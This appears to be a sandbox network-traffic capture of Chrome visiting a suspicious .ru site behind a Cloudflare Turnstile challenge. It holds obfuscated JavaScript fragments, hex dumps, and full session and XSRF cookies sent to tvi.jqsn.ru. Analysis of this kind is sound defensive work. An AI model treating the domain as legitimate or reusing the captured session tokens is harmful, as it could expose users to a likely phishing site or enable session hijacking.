                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 28 31 37 33 37 29 2c 66 50 5b 69 76 28 32 33 30 30 29 5d 3d 69 76 28 38 34 36 29 2c 66 50 5b 69 76 28 31 38 31 39 29 5d 3d 69 76 28 32 38 35 33 29 2c 66 50 5b 69 76 28 31 31 34 36 29 5d 3d 69 76 28 32 31 38 33 29 2c 66 50 5b 69 76 28 32 31 37 39 29 5d 3d 69 76 28 34 36 33 29 2c 66 50 5b 69 76 28 32 34 36 33 29 5d 3d 69 76 28 32 36 36 33 29 2c 66 50 5b 69 76 28 33 30 36 31 29 5d 3d 69 76 28 32 32 39 32 29 2c 66 50 5b 69 76 28 32 39 37 31 29 5d 3d 69 76 28 36 38 34 29 2c 66 50 5b 69 76 28 32 38 38 30 29 5d 3d 69 76 28 33 31 34 31 29 2c 66 50 5b 69 76 28 32 35 39 30 29 5d 3d 69 76 28 31 39 30 31 29 2c 66 50 5b 69 76 28 32 36 32 30 29 5d 3d 69 76 28 36 37 34 29 2c 66 50 5b 69 76 28 32 36 30 34 29 5d 3d 69 76 28 32 38 34 37 29 2c 66 50 5b 69 76 28 31 35 31 35
                                                                                                                          Data Ascii: (1737),fP[iv(2300)]=iv(846),fP[iv(1819)]=iv(2853),fP[iv(1146)]=iv(2183),fP[iv(2179)]=iv(463),fP[iv(2463)]=iv(2663),fP[iv(3061)]=iv(2292),fP[iv(2971)]=iv(684),fP[iv(2880)]=iv(3141),fP[iv(2590)]=iv(1901),fP[iv(2620)]=iv(674),fP[iv(2604)]=iv(2847),fP[iv(1515
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 69 76 28 33 30 32 30 29 5d 3d 69 76 28 32 32 30 33 29 2c 66 52 5b 69 76 28 31 37 33 36 29 5d 3d 69 76 28 32 37 34 33 29 2c 66 52 5b 69 76 28 32 38 35 31 29 5d 3d 69 76 28 31 34 32 39 29 2c 66 52 5b 69 76 28 31 31 30 31 29 5d 3d 69 76 28 39 32 30 29 2c 66 52 5b 69 76 28 32 35 37 39 29 5d 3d 69 76 28 31 36 36 35 29 2c 66 52 5b 69 76 28 32 33 39 37 29 5d 3d 69 76 28 32 31 34 39 29 2c 66 52 5b 69 76 28 34 36 35 29 5d 3d 69 76 28 31 36 31 36 29 2c 66 52 5b 69 76 28 31 31 32 30 29 5d 3d 69 76 28 32 30 34 39 29 2c 66 52 5b 69 76 28 32 33 34 31 29 5d 3d 69 76 28 31 30 34 39 29 2c 66 52 5b 69 76 28 31 33 39 32 29 5d 3d 69 76 28 31 35 36 32 29 2c 66 52 5b 69 76 28 32 35 37 36 29 5d 3d 69 76 28 32 30 36 34 29 2c 66 52 5b 69 76 28 32 33 32 33 29 5d 3d 69 76 28 32 32
                                                                                                                          Data Ascii: iv(3020)]=iv(2203),fR[iv(1736)]=iv(2743),fR[iv(2851)]=iv(1429),fR[iv(1101)]=iv(920),fR[iv(2579)]=iv(1665),fR[iv(2397)]=iv(2149),fR[iv(465)]=iv(1616),fR[iv(1120)]=iv(2049),fR[iv(2341)]=iv(1049),fR[iv(1392)]=iv(1562),fR[iv(2576)]=iv(2064),fR[iv(2323)]=iv(22
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 35 38 39 29 2c 66 53 5b 69 76 28 32 35 39 30 29 5d 3d 69 76 28 31 38 30 33 29 2c 66 53 5b 69 76 28 32 36 32 30 29 5d 3d 69 76 28 39 35 30 29 2c 66 53 5b 69 76 28 32 36 30 34 29 5d 3d 69 76 28 39 37 36 29 2c 66 53 5b 69 76 28 31 35 31 35 29 5d 3d 69 76 28 38 32 38 29 2c 66 53 5b 69 76 28 31 36 38 39 29 5d 3d 69 76 28 35 30 37 29 2c 66 53 5b 69 76 28 38 33 39 29 5d 3d 69 76 28 31 39 35 36 29 2c 66 53 5b 69 76 28 32 30 32 33 29 5d 3d 69 76 28 32 39 32 36 29 2c 66 53 5b 69 76 28 35 30 31 29 5d 3d 69 76 28 32 33 36 34 29 2c 66 54 3d 7b 7d 2c 66 54 5b 69 76 28 32 30 34 35 29 5d 3d 69 76 28 31 36 34 34 29 2c 66 54 5b 69 76 28 32 35 31 33 29 5d 3d 69 76 28 37 35 38 29 2c 66 54 5b 69 76 28 32 33 39 30 29 5d 3d 69 76 28 32 32 31 34 29 2c 66 54 5b 69 76 28 31 34 31
                                                                                                                          Data Ascii: 589),fS[iv(2590)]=iv(1803),fS[iv(2620)]=iv(950),fS[iv(2604)]=iv(976),fS[iv(1515)]=iv(828),fS[iv(1689)]=iv(507),fS[iv(839)]=iv(1956),fS[iv(2023)]=iv(2926),fS[iv(501)]=iv(2364),fT={},fT[iv(2045)]=iv(1644),fT[iv(2513)]=iv(758),fT[iv(2390)]=iv(2214),fT[iv(141
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 28 32 34 32 31 29 2c 66 55 5b 69 76 28 31 33 39 32 29 5d 3d 69 76 28 33 31 37 31 29 2c 66 55 5b 69 76 28 32 35 37 36 29 5d 3d 69 76 28 31 38 31 35 29 2c 66 55 5b 69 76 28 32 33 32 33 29 5d 3d 69 76 28 37 32 34 29 2c 66 55 5b 69 76 28 32 31 39 32 29 5d 3d 69 76 28 31 31 36 32 29 2c 66 55 5b 69 76 28 35 39 32 29 5d 3d 69 76 28 32 36 32 38 29 2c 66 55 5b 69 76 28 32 34 39 31 29 5d 3d 69 76 28 31 32 33 38 29 2c 66 55 5b 69 76 28 32 38 31 30 29 5d 3d 69 76 28 31 37 34 33 29 2c 66 55 5b 69 76 28 32 33 30 30 29 5d 3d 69 76 28 31 36 37 39 29 2c 66 55 5b 69 76 28 31 38 31 39 29 5d 3d 69 76 28 31 38 36 32 29 2c 66 55 5b 69 76 28 31 31 34 36 29 5d 3d 69 76 28 31 34 38 34 29 2c 66 55 5b 69 76 28 32 31 37 39 29 5d 3d 69 76 28 37 31 33 29 2c 66 55 5b 69 76 28 32 34 36
                                                                                                                          Data Ascii: (2421),fU[iv(1392)]=iv(3171),fU[iv(2576)]=iv(1815),fU[iv(2323)]=iv(724),fU[iv(2192)]=iv(1162),fU[iv(592)]=iv(2628),fU[iv(2491)]=iv(1238),fU[iv(2810)]=iv(1743),fU[iv(2300)]=iv(1679),fU[iv(1819)]=iv(1862),fU[iv(1146)]=iv(1484),fU[iv(2179)]=iv(713),fU[iv(246
                                                                                                                          2024-04-17 00:34:27 UTC1369INData Raw: 29 5d 3d 69 76 28 32 32 37 30 29 2c 66 57 5b 69 76 28 32 35 31 33 29 5d 3d 69 76 28 32 35 31 35 29 2c 66 57 5b 69 76 28 32 33 39 30 29 5d 3d 69 76 28 31 36 38 34 29 2c 66 57 5b 69 76 28 31 34 31 32 29 5d 3d 69 76 28 32 39 38 39 29 2c 66 57 5b 69 76 28 31 37 36 39 29 5d 3d 69 76 28 31 31 37 38 29 2c 66 57 5b 69 76 28 38 34 31 29 5d 3d 69 76 28 31 38 31 37 29 2c 66 57 5b 69 76 28 31 30 30 33 29 5d 3d 69 76 28 31 36 31 30 29 2c 66 57 5b 69 76 28 33 30 32 30 29 5d 3d 69 76 28 32 39 31 32 29 2c 66 57 5b 69 76 28 31 37 33 36 29 5d 3d 69 76 28 36 34 39 29 2c 66 57 5b 69 76 28 32 38 35 31 29 5d 3d 69 76 28 31 36 36 32 29 2c 66 57 5b 69 76 28 31 31 30 31 29 5d 3d 69 76 28 32 36 39 34 29 2c 66 57 5b 69 76 28 32 35 37 39 29 5d 3d 69 76 28 31 39 37 38 29 2c 66 57 5b
                                                                                                                          Data Ascii: )]=iv(2270),fW[iv(2513)]=iv(2515),fW[iv(2390)]=iv(1684),fW[iv(1412)]=iv(2989),fW[iv(1769)]=iv(1178),fW[iv(841)]=iv(1817),fW[iv(1003)]=iv(1610),fW[iv(3020)]=iv(2912),fW[iv(1736)]=iv(649),fW[iv(2851)]=iv(1662),fW[iv(1101)]=iv(2694),fW[iv(2579)]=iv(1978),fW[


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.449749104.17.2.1844433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:27 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normal
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:28 UTC248INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:28 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cache-control: max-age=2629800, public
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8758545d7876137f-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:34:28 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                          Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                                                                                          2024-04-17 00:34:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.449738104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:28 UTC1310OUTGET /favicon.ico HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://tvi.jqsn.ru/i8jbs1sy/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IjdFR0ZSajlLampnQ3R3RmpLbkt3a0E9PSIsInZhbHVlIjoiNDZLaGJoeUhhWGFRZWhkU0VkRlRSa1IrVVVWekdyTm0yMCtHMk8rVVA3d2NzQmZRSlhDalpMTFJFTTZOM1hVZXNKbnJ2T0VGWnNLVkZPcUpaSEtVKzIyYXhTQmhsMzkzM0tqVThVV0tTSURMMDh6VFAxeWwzUW9BeVlnRTlaOTUiLCJtYWMiOiIzNDMzZGY0NmI0MTdhZTIyOTlhYTgzNDNkZjg5NzRkZjk0YjJlMTVhOWU5NjhjMTI4ZmQzODQ4MmM3YjAxNzkxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlJTUUhoZ1FnQnFKVS8rRE8vd1lQY1E9PSIsInZhbHVlIjoiREpzT1RGUm5BQ0w3aC9JT1NRcEN5d0dxN2JaOFkya3FFQXJ5T0tlT2pzOGZOYXdVd0daQjBZQzIyL0Q1YkZqbkxGNElVQlpobWlET041V3dqY3hWc3dHMm55UjJJR3ZOR3JaRnl0Vi9KZy9Nb1kybXZMR3pTczdEZWJVZlZFOVEiLCJtYWMiOiIwMjQyNTNjYjFjMzU3YTU0M2Q2MjMwMDNkZDFjMjlkZmU5M2NjZTI1MTE0ZjUxZjQ0NTM2NWJhYjBkYjE0NWFmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:28 UTC739INHTTP/1.1 404 Not Found
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:28 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Cache-Control: max-age=14400
                                                                                                                          Age: 7215
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2Fdah5A1d7hlg7hb04ppSsBJKMsf%2Bt6RPJ9%2BUEYcjiaSTzWY3T1dulP4JjnTYNxn6TpaCo4FHB58wFDZjPCXCP00rT3ecBmbaeYu3IKZ7NwB5HG89WpUPCGX%2BbcISQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854604cc87bab-ATL
                                                                                                                          2024-04-17 00:34:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.449750104.17.3.1844433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:28 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:28 UTC248INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:28 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cache-control: max-age=2629800, public
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854619ba2678c-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:34:28 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                          Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                                                                                          2024-04-17 00:34:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.449751104.17.2.1844433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:28 UTC915OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/376309965:1713310987:XtWNF_lGr5ooSfnAjw_nRac0X3c-4XXJ9QQQN9vg0as/875854595e7f53f2/ce9d72d10a780bc HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 2574
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          CF-Challenge: ce9d72d10a780bc
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normal
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:28 UTC2574OUTData Raw: 76 5f 38 37 35 38 35 34 35 39 35 65 37 66 35 33 66 32 3d 76 56 44 36 51 36 75 36 46 36 24 36 32 34 4f 4d 34 4f 77 36 34 33 65 24 48 7a 34 35 4f 48 4f 42 71 33 31 47 57 4f 61 62 4f 63 33 48 6f 33 37 6d 4f 54 73 45 4f 34 24 4f 78 4f 46 36 37 24 41 71 57 4f 76 4f 4b 39 57 4f 38 59 78 61 38 55 4f 75 58 39 4f 4c 63 59 37 46 44 4f 65 37 57 34 6c 6c 4f 62 44 37 77 4f 31 39 37 78 31 45 64 45 56 4f 6a 36 62 6f 59 73 63 4f 65 43 6b 6a 37 56 38 6a 4f 63 46 77 33 4e 63 55 24 4f 4f 39 37 37 34 4b 43 44 50 4b 39 78 65 31 51 69 4f 62 24 4f 33 36 34 63 62 54 24 4f 68 37 57 4f 54 36 34 67 4b 37 36 57 74 69 77 44 39 31 44 4f 6d 47 33 56 4f 37 44 4f 42 47 39 39 4f 34 44 4f 6b 36 37 6e 4f 65 44 47 43 72 6f 4f 69 72 57 4f 48 36 65 63 6e 72 57 4b 59 50 6d 38 4f 50 50 25 32 62
                                                                                                                          Data Ascii: v_875854595e7f53f2=vVD6Q6u6F6$624OM4Ow643e$Hz45OHOBq31GWOabOc3Ho37mOTsEO4$OxOF67$AqWOvOK9WO8Yxa8UOuX9OLcY7FDOe7W4llObD7wO197x1EdEVOj6boYscOeCkj7V8jOcFw3NcU$OO9774KCDPK9xe1QiOb$O364cbT$Oh7WOT64gK76WtiwD91DOmG3VO7DOBG99O4DOk67nOeDGCroOirWOH6ecnrWKYPm8OPP%2b
                                                                                                                          2024-04-17 00:34:28 UTC691INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:28 GMT
                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cf-chl-gen: 9SorLH9zv30bKtgmQWcZN5O5vDqReMxfh4sfk0UcXz9MxcVjx0wjPGglAG1lNADKUYZzKipRlGRZDQyjl0MGNvwAq9N0YZNSXlSB0Ww4u8y8AWPq9ddGx88xch4QN0M2qu8evez5rsjxZe4VpSb/pVbu5BP0AGxkMJgN794qZwNgAii/ZSQNp+vmc0dIfneW6uEEBh/mlDi+AtItV6kUlQNW+nvE/7QGSDlpHYt2S2Nzcc9ECL8Dtza7Z3nOVQklU5Np1d4CCWzP7iBtVhU4574yh0EitdfitWrZIjkKAnLdP9ihPFEOWN8Zr9ZO169XddXUMRFnVgps7ZZbJupBvrDXDtCdWRg9jsXo8YGICwGIuk5yGujJxU+Db2vXg+ldeSBOqOvQ67vhEy1Fk1dybLW7zHc6qMhpugKVaRrwoY0=$nNi0WGmesvZ/CrZhmKi4jA==
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 87585461d8caada6-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:34:28 UTC678INData Raw: 37 63 66 63 0d 0a 65 57 4e 2f 62 46 79 4b 61 49 2b 50 5a 35 46 33 6a 33 4b 50 65 31 4a 79 58 4a 4a 64 55 33 31 69 6c 33 5a 68 6b 6d 4b 42 69 57 5a 34 59 35 39 72 66 6f 79 61 69 37 43 7a 68 58 39 7a 70 71 69 49 62 70 53 61 72 72 47 53 77 4c 61 6b 66 4a 75 50 70 36 4b 41 67 63 53 65 6d 73 61 34 72 73 47 76 73 62 48 46 73 37 53 52 30 73 32 54 32 5a 66 4f 6d 36 72 67 78 4a 2b 75 35 4d 4b 7a 6d 37 4c 44 74 75 76 5a 33 65 65 36 77 63 75 2f 79 38 58 75 73 2f 58 46 2f 50 48 52 7a 62 66 37 32 63 72 50 75 76 4c 46 30 63 66 57 35 38 62 57 42 77 51 51 79 65 58 50 41 42 4c 54 41 41 45 57 36 2b 63 57 35 74 33 55 44 42 62 31 49 4e 34 56 33 2f 54 79 48 53 51 49 42 43 63 4d 4a 65 34 68 4d 2b 37 73 48 78 54 79 39 53 59 4a 43 51 30 6f 48 52 67 34 39 6a 6a 36 51 54 51 58 52
                                                                                                                          Data Ascii: 7cfceWN/bFyKaI+PZ5F3j3KPe1JyXJJdU31il3ZhkmKBiWZ4Y59rfoyai7CzhX9zpqiIbpSarrGSwLakfJuPp6KAgcSemsa4rsGvsbHFs7SR0s2T2ZfOm6rgxJ+u5MKzm7LDtuvZ3ee6wcu/y8Xus/XF/PHRzbf72crPuvLF0cfW58bWBwQQyeXPABLTAAEW6+cW5t3UDBb1IN4V3/TyHSQIBCcMJe4hM+7sHxTy9SYJCQ0oHRg49jj6QTQXR
                                                                                                                          2024-04-17 00:34:28 UTC1369INData Raw: 62 31 6f 2f 52 33 79 48 68 59 5a 75 54 56 70 67 63 6f 35 75 6c 6c 46 32 5a 34 64 73 64 70 61 65 69 61 43 66 62 46 39 75 6f 48 43 66 68 5a 47 6c 71 61 57 57 65 34 42 6e 6f 5a 78 73 6e 70 35 79 70 4b 75 78 6f 5a 57 34 6c 58 57 2b 72 4b 69 52 72 37 61 51 6f 35 64 39 70 59 6d 6c 66 5a 72 45 75 62 75 4d 71 63 57 53 79 4d 2f 47 77 64 4c 57 7a 39 7a 63 7a 5a 44 63 32 36 44 52 35 4c 36 33 76 63 62 66 76 73 65 69 74 62 2b 71 77 73 53 35 73 4d 37 79 79 4f 53 75 36 65 37 56 78 63 6a 47 7a 2b 76 52 7a 4c 77 42 32 65 62 45 77 67 6e 32 2b 74 72 72 37 66 6a 77 2b 42 41 48 42 66 37 74 37 4e 4c 69 45 41 72 73 45 52 77 55 44 52 6a 79 34 68 51 66 42 43 54 6d 48 52 6b 46 39 67 6e 34 37 52 77 44 47 67 6a 74 37 75 63 68 39 43 55 35 2b 53 7a 7a 50 44 6b 65 4d 45 50 37 46 55 45
                                                                                                                          Data Ascii: b1o/R3yHhYZuTVpgco5ullF2Z4dsdpaeiaCfbF9uoHCfhZGlqaWWe4BnoZxsnp5ypKuxoZW4lXW+rKiRr7aQo5d9pYmlfZrEubuMqcWSyM/GwdLWz9zczZDc26DR5L63vcbfvseitb+qwsS5sM7yyOSu6e7VxcjGz+vRzLwB2ebEwgn2+trr7fjw+BAHBf7t7NLiEArsERwUDRjy4hQfBCTmHRkF9gn47RwDGgjt7uch9CU5+SzzPDkeMEP7FUE
                                                                                                                          2024-04-17 00:34:28 UTC1369INData Raw: 6f 53 45 57 48 70 72 67 48 39 6b 59 30 79 4f 6a 59 64 55 6c 32 31 54 64 6e 6c 34 64 33 6d 4e 6d 4a 32 5a 6b 59 57 6a 68 70 35 6c 61 32 61 48 73 48 31 6f 73 36 42 2f 6a 33 43 4e 75 4a 71 4c 68 58 32 71 6e 6f 31 37 6f 71 47 4d 75 38 47 77 6f 73 6d 57 6e 4a 6d 6d 69 35 75 5a 79 4d 47 79 31 4a 32 55 72 36 43 31 6b 39 47 5a 30 4e 50 5a 74 74 65 69 73 75 57 66 34 75 58 68 76 4c 69 64 76 4d 65 35 6f 65 4c 6d 78 4e 48 77 77 2b 2f 34 37 66 44 35 77 38 36 35 74 62 2f 77 37 65 50 50 39 76 6a 35 30 2f 73 42 39 41 48 64 42 66 6e 64 7a 41 2f 36 34 52 44 4e 41 41 77 55 44 52 4c 55 2b 52 55 48 37 64 77 62 43 2f 48 6b 46 78 41 63 4a 43 45 54 41 4f 58 6d 4b 67 63 6e 4d 65 67 74 2f 50 51 6d 43 41 63 54 46 41 55 4e 46 51 30 59 2f 43 41 32 49 6a 45 6e 4e 68 30 30 46 55 49 6d
                                                                                                                          Data Ascii: oSEWHprgH9kY0yOjYdUl21Tdnl4d3mNmJ2ZkYWjhp5la2aHsH1os6B/j3CNuJqLhX2qno17oqGMu8GwosmWnJmmi5uZyMGy1J2Ur6C1k9GZ0NPZtteisuWf4uXhvLidvMe5oeLmxNHww+/47fD5w865tb/w7ePP9vj50/sB9AHdBfndzA/64RDNAAwUDRLU+RUH7dwbC/HkFxAcJCETAOXmKgcnMegt/PQmCAcTFAUNFQ0Y/CA2IjEnNh00FUIm
                                                                                                                          2024-04-17 00:34:28 UTC1369INData Raw: 35 2b 5a 31 4e 52 67 30 75 46 61 56 4f 4d 6d 57 70 66 64 6c 6d 50 62 70 46 68 57 58 4e 6d 68 48 64 6e 62 59 4f 59 6f 6d 75 52 6e 59 4a 77 74 6e 65 4e 71 6e 69 78 6d 34 79 51 65 37 65 71 73 4a 47 68 73 61 36 77 6d 73 50 48 67 58 36 67 6d 61 57 38 70 4c 7a 49 6b 62 61 66 75 4b 50 4b 72 4d 57 37 6c 4e 6d 52 76 4c 4b 72 30 61 4f 30 73 4c 54 6e 73 37 7a 59 75 61 32 6b 79 4f 4c 4f 73 4c 7a 70 71 38 75 30 37 39 72 47 75 72 4c 70 39 62 58 66 73 37 6a 79 41 72 66 69 30 41 50 66 31 2f 72 6f 35 4e 66 62 38 65 6e 36 78 65 76 6a 34 41 4c 57 36 4e 48 62 37 52 6b 65 39 74 30 42 37 51 34 69 46 42 38 57 39 50 50 79 39 42 63 59 2b 77 6b 62 44 76 73 31 4a 77 76 2b 39 77 4d 6c 4e 41 38 4c 47 51 67 67 47 6a 45 73 4a 52 34 32 4d 6b 62 36 46 41 67 49 47 45 51 6e 48 6b 63 2b 51
                                                                                                                          Data Ascii: 5+Z1NRg0uFaVOMmWpfdlmPbpFhWXNmhHdnbYOYomuRnYJwtneNqnixm4yQe7eqsJGhsa6wmsPHgX6gmaW8pLzIkbafuKPKrMW7lNmRvLKr0aO0sLTns7zYua2kyOLOsLzpq8u079rGurLp9bXfs7jyArfi0APf1/ro5Nfb8en6xevj4ALW6NHb7Rke9t0B7Q4iFB8W9PPy9BcY+wkbDvs1Jwv+9wMlNA8LGQggGjEsJR42Mkb6FAgIGEQnHkc+Q
                                                                                                                          2024-04-17 00:34:28 UTC1369INData Raw: 6d 62 5a 68 50 6c 31 35 63 58 48 53 5a 66 6e 39 67 58 33 56 6d 71 32 65 47 70 6e 70 34 6b 61 2b 77 6b 4a 79 4e 6c 33 4e 76 68 62 47 4f 66 48 69 31 6c 58 36 41 75 6e 31 37 6a 59 35 39 74 59 4f 6e 6f 73 65 6c 79 37 43 75 6a 63 66 4a 77 4d 58 4c 6b 37 4c 4b 6c 36 69 56 71 64 2b 78 75 62 62 4b 33 75 54 5a 6f 4b 50 54 6f 4c 33 64 31 4e 62 72 72 2b 4f 75 36 64 7a 6b 31 76 54 4d 39 65 66 4b 2b 38 2b 7a 31 39 76 64 2f 66 7a 42 33 66 44 55 34 50 54 41 39 4d 54 4b 2f 74 34 41 33 41 4c 4e 45 4e 34 46 2f 67 7a 75 36 52 6b 57 45 2b 7a 32 45 74 6f 41 46 52 73 6d 47 66 67 58 33 68 51 64 49 77 34 6e 4a 65 77 6a 42 41 6a 71 4a 69 30 57 45 6a 55 34 4b 50 55 4e 46 51 38 64 50 79 73 42 2b 54 4d 42 49 55 6b 57 46 51 73 68 48 41 35 4c 50 6a 45 7a 48 56 45 56 56 44 49 69 52 6c
                                                                                                                          Data Ascii: mbZhPl15cXHSZfn9gX3Vmq2eGpnp4ka+wkJyNl3NvhbGOfHi1lX6Aun17jY59tYOnosely7CujcfJwMXLk7LKl6iVqd+xubbK3uTZoKPToL3d1Nbrr+Ou6dzk1vTM9efK+8+z19vd/fzB3fDU4PTA9MTK/t4A3ALNEN4F/gzu6RkWE+z2EtoAFRsmGfgX3hQdIw4nJewjBAjqJi0WEjU4KPUNFQ8dPysB+TMBIUkWFQshHA5LPjEzHVEVVDIiRl
